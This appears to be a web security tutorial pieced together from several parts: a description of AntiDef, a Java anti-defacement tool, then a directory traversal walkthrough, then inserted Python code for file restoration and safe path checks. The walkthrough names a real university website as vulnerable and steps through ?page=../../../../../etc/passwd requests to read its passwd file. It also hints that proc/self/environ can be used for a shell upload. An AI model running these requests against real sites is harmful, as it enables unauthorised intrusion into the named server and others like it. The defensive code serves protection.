There are many techniques that can be used to deface a website; however, one of the most common techniques used for defacement is simple SQL Injection, which allows the hacker to gain administrative access to the website. Sometimes the hacker may manage to gain root access to the web server and may therefore cause a mass defacement, replacing the index files of all the websites hosted on that particular server. This is difficult to do manually, but there are many scripts that automate it.

If you are a webmaster looking to protect your website from being defaced or hacked, you are in the right place. AntiDef is a tool written in Java, specially designed for the purpose of protecting a website from being defaced or hacked. The usage is quite simple: all the server manager has to do is run this application with the following parameters:

  • Path to the copy of the website(source).
  • Path to the application directory.
  • Path to log directory.

How Does This Tool Work?

The tool compares the source and the destination files; if they are found to be different, it replaces the files with the backup or original files.
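The comparison loop the tool is described as running can be shown in a few lines. The Python below is an added illustration written for this page, not AntiDef's Java source, and it assumes only the three inputs listed above (a clean copy, the live site directory and a log). It hashes both trees, copies back any file whose hash differs from the clean copy or is missing, and reports files present on the live site but absent from the copy rather than deleting them, so an investigator can still look at them. The sample site demo() builds in a temporary directory is constructed for the demonstration.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large assets do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> Dict[str, str]:
    """Map every file under root (as a path relative to root) to its SHA-256."""
    return {str(p.relative_to(root)): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def check_and_restore(source: Path, site: Path, log: List[str]) -> Tuple[List[str], List[str]]:
    """Compare the clean copy with the live site and put back anything changed or missing.

    Returns (restored relative paths, unexpected extra relative paths). Extra files are
    only logged, never deleted, so that evidence of how the site was altered survives.
    """
    clean, live = snapshot(source), snapshot(site)
    restored, extra = [], []
    for rel, digest in clean.items():
        if live.get(rel) != digest:
            target = site / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(source / rel, target)
            log.append(f"restored {rel}: live={live.get(rel)} clean={digest}")
            restored.append(rel)
    for rel, digest in live.items():
        if rel not in clean:
            log.append(f"unexpected file {rel} sha256={digest}")
            extra.append(rel)
    return restored, extra


def demo() -> Tuple[List[str], List[str], str]:
    """Build a clean copy and a live site, alter the live copy, run one check.

    The directory layout and contents are constructed for the demo.
    """
    base = Path(tempfile.mkdtemp())
    source, site = base / "source", base / "site"
    for d in (source, site):
        (d / "img").mkdir(parents=True)
        (d / "index.html").write_text("<h1>Welcome</h1>")
        (d / "img" / "logo.txt").write_text("logo")
    (site / "index.html").write_text("<h1>defaced</h1>")          # the defacement
    (site / "dropped.php").write_text("<?php /* unexpected */ ?>")  # a file that should not exist
    log: List[str] = []
    restored, extra = check_and_restore(source, site, log)
    return restored, extra, (site / "index.html").read_text()


if __name__ == "__main__":
    restored_files, extra_files, index_now = demo()
    print("restored:", restored_files)   # ['index.html']
    print("unexpected:", extra_files)    # ['dropped.php']
    print("index.html now:", index_now)  # <h1>Welcome</h1>
```

In a real deployment the clean copy must live somewhere the web server's account cannot write, otherwise whoever defaced the site can simply deface the backup too, and the check is run on a schedule or from an inotify-style watcher rather than once.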

Hack a website using a Directory Traversal attack?

What is the root directory of a web server?

It is a specific directory on the server in which the web contents are placed and can be seen by website visitors. The directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible to a visitor on a website is placed in the root directory. The visitor cannot step out of the root directory.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, say we are at the location C:\xx\yy\zz. On typing ..\ we would reach C:\xx\yy.

Again on typing ..\ we would reach C:\xx.

Let's again go to the location C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in the folder xx. We can type ..\..\abc.txt. Typing ..\ two times takes us two directories up (that is, to the directory xx) where abc.txt is placed.

Note: It's ..\ on Windows and ../ on UNIX-like operating systems.

What is a Directory Traversal attack?

Directory Traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website, which is vulnerable to a directory traversal attack:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory ‘etc’ on Unix/Linux which contains the configuration files of the programs that run on the system. Some of the files placed in the ‘etc’ directory are passwd, shadow, profile and sbin.

The file etc/passwd contains the login names of users and sometimes even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Look carefully at the position of the directories on the web server.

We do not know the actual names and contents of the directories, except ‘etc’, which is a default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.


Let's type this in the URL field and press Enter:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will search for the directory ‘etc’ in F. But obviously there is nothing like this in F, so it will return nothing.

Now type

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd

Now this will step up one directory (to directory E) and look for ‘etc’, but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd

Now this will step up two directories (to directory D) and look for ‘etc’, but again it will return nothing.

So, proceeding like this, we go to this URL:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us 5 directories up to the root of the drive and then into the ‘etc’ directory, and shows us the contents of the ‘passwd’ file.
To understand the contents of the ‘passwd’ file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile, etc/services and many other files, like backup files which may contain sensitive data. Some files like etc/shadow may not be accessible, because they are readable only by privileged users.

Note: If proc/self/environ were accessible, you might be able to upload a shell to the server; this is known as Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input
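Countermeasure 2 deserves a concrete shape. The Python function below is an added example rather than anything from the article or from the site referenced above; it shows how a ?page= style parameter can be resolved safely: reject NUL bytes and absolute paths, normalise both slash styles, resolve the candidate path and accept it only if it still lies under the web root and is a .php page. The web root and the file that demo() creates live in a temporary directory constructed for the demonstration.

```python
import tempfile
from pathlib import Path
from typing import Dict, Optional


def resolve_include(web_root: Path, requested: str) -> Optional[Path]:
    """Return the file a ?page= value may include, or None if it escapes the web root."""
    if "\x00" in requested:                       # NUL bytes truncate paths in some runtimes
        return None
    normalised = requested.replace("\\", "/")     # treat ..\ exactly like ../
    if normalised.startswith("/"):                # an absolute path would replace the root
        return None
    root = web_root.resolve()
    candidate = (root / normalised).resolve()     # collapses every ../ against the real tree
    if candidate != root and root not in candidate.parents:
        return None                               # landed outside the root after normalisation
    if candidate.suffix != ".php":                # only page scripts are includable
        return None
    return candidate


def demo() -> Dict[str, Optional[Path]]:
    """Create a throw-away web root with one page and run the same inputs the article uses.

    The directory and page file are constructed for the demo.
    """
    root = Path(tempfile.mkdtemp())
    (root / "notification.php").write_text("<?php echo 'notice'; ?>")
    inputs = [
        "notification.php",
        "../../../../../etc/passwd",
        "..\\..\\etc\\passwd",
        "/etc/passwd",
        "sub/../notification.php",
        "notification.php\x00.txt",
    ]
    results = {value: resolve_include(root, value) for value in inputs}
    results["__root__"] = root.resolve()          # so a caller can compare against the root
    return results


if __name__ == "__main__":
    for value, path in demo().items():
        print(repr(value), "->", path)
```

The check is done after resolve() rather than by searching the string for "../", because encodings and mixed slashes make string filters brittle; comparing the final real path against the root is the property that actually matters. An allowlist of known page names is stricter still and is the better choice when the set of includable pages is small.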